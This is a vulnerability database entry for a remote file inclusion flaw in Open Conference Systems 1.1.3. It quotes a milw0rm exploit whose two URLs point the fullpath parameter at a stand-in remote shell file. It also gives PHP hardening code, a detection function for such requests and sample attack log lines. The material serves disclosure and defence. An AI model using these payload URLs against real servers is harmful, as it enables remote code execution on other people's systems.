Open Conference Systems: Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1111282    Vulnerability type: Input validation
Published: 2006-10-13    Updated: 2006-10-18
CVE: CVE-2006-5308    CNNVD-ID: CNNVD-200610-255
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2536
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-255
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities exist in Open Conference Systems (OCS). A remote attacker can execute arbitrary PHP code via a URL supplied in the fullpath parameter of (1) include/theme.inc.php or (2) include/footer.inc.php.
|Vulnerability EXP
#########################################################################
# Open Conference Systems <= 1.1.3 Remote File Inclusion
# Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org
########################################################################
file ;
  theme.inc.php
  footer.inc.php
########################################################################
bugs ;
at -- theme.inc.php
 include($fullpath."themes/$theme/theme.inc.php");
at -- footer.inc.php
 include_once($fullpath."include/theme.inc.php");
########################################################################
example and exploit method ;
 http://localhost/ocs/include/theme.inc.php?fullpath=http://shell/cmd.gif?
 http://localhost/ocs/include/footer.inc.php?fullpath=http://shell/cmd.gif?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubicrew (all member solpotcrew community)
#asiahacker
person;
y3dips,lirva32,the_day,K-159(&all echo staff)
evilcode,illibero,NoGe(asiahacker),
nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)

# milw0rm.com [2006-10-13]
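The two include statements quoted above take their base path from a variable that the include file itself never assigns, so with register_globals enabled the value can arrive from the request, and with URL includes enabled include() will fetch and execute a remote file. The following is an added example written for this page, not OCS code and not the advisory author's code; it shows the vulnerable pattern beside a hardened replacement that derives the base path locally, refuses direct access to the include file, whitelists the theme name, and confines the resolved path to the themes directory. The guard constant OCS_ENTRY, the function names, and the sample log lines are all constructed for illustration.

```php
<?php
// Added example (not OCS code): vulnerable include pattern beside a hardened one.
// Assumed context: PHP 4/5-era defaults where register_globals and URL includes may be on.

// --- Vulnerable pattern (the shape described in the advisory) ---
// $fullpath is never assigned here. With register_globals=On, a request parameter
// named fullpath silently populates it, and include() will load whatever it points at.
function vulnerable_theme_include($fullpath, $theme)
{
    include($fullpath . "themes/$theme/theme.inc.php");
}

// --- Hardened pattern ---
// 1. Include files refuse to run unless the application entry point defined a guard.
//    (OCS_ENTRY is a constructed name for this example.)
if (!defined('OCS_ENTRY')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access not permitted');
}

function safe_theme_include($theme)
{
    // 2. Base path comes from the script's own location, never from request data.
    $base = realpath(dirname(__FILE__) . '/..');
    $themesDir = $base . DIRECTORY_SEPARATOR . 'themes' . DIRECTORY_SEPARATOR;

    // 3. Whitelist the theme name so it cannot carry slashes, dots or a URL scheme.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $theme)) {
        throw new InvalidArgumentException('Invalid theme name');
    }

    // 4. Resolve the final path and confirm it still lives under the themes directory.
    $target = realpath($themesDir . $theme . DIRECTORY_SEPARATOR . 'theme.inc.php');
    if ($target === false || strpos($target, $themesDir) !== 0) {
        throw new RuntimeException('Theme file not found or outside themes directory');
    }
    include $target;
}

// --- Detection aid: flag access-log lines whose fullpath parameter carries a URL scheme ---
// Returns the subset of lines that match the RFI pattern from the advisory.
function find_rfi_attempts(array $logLines)
{
    $hits = array();
    foreach ($logLines as $line) {
        if (preg_match('#[?&]fullpath=(https?|ftp)(%3A|:)#i', $line)) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample log lines for demonstration only.
$sampleLog = array(
    '203.0.113.5 - - [13/Oct/2006:10:01:02] "GET /ocs/include/theme.inc.php?fullpath=http://example.invalid/x? HTTP/1.0" 200 512',
    '198.51.100.7 - - [13/Oct/2006:10:01:09] "GET /ocs/index.php?page=schedule HTTP/1.0" 200 2048',
    '203.0.113.5 - - [13/Oct/2006:10:01:15] "GET /ocs/include/footer.inc.php?fullpath=ftp%3A%2F%2Fexample.invalid%2F HTTP/1.0" 200 512',
);
$suspicious = find_rfi_attempts($sampleLog);   // two of the three constructed lines match
printf("%d suspicious request(s) found\n", count($suspicious));
```

Alongside the code change, the server-side settings that make this class of bug exploitable should be off: register_globals = Off (so request data never becomes a bare variable) and allow_url_fopen / allow_url_include = Off where the application does not need remote streams. The detection helper is intentionally narrow, matching only the fullpath parameter named in this advisory; widen the parameter list to cover other include-path variables in your own code base.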
|References

Source: BID
Name: 20567
Link: http://www.securityfocus.com/bid/20567
Source: VUPEN
Name: ADV-2006-4041
Link: http://www.frsirt.com/english/advisories/2006/4041
Source: SECTRACK
Name: 1017071
Link: http://securitytracker.com/id?1017071
Source: SECUNIA
Name: 22412
Link: http://secunia.com/advisories/22412
Source: XF
Name: ocs-fullpath-file-include(29517)
Link: http://xforce.iss.net/xforce/xfdb/29517
Source: MILW0RM
Name: 2536
Link: http://www.milw0rm.com/exploits/2536
Source: pkp.sfu.ca:8043
Link: http://pkp.sfu.ca:8043/bugzilla/show_bug.cgi?id=2436
Source: pkp.sfu.ca:8043
Link: http://pkp.sfu.ca:8043/bugzilla/attachment.cgi?id=90
Source: pkp.sfu.ca
Link: http://pkp.sfu.ca/ocs_download
Source: MISC
Link: http://isc.sans.org/diary.php?storyid=1791
Source: MILW0RM
Name: 2536
Link: http://milw0rm.com/exploits/2536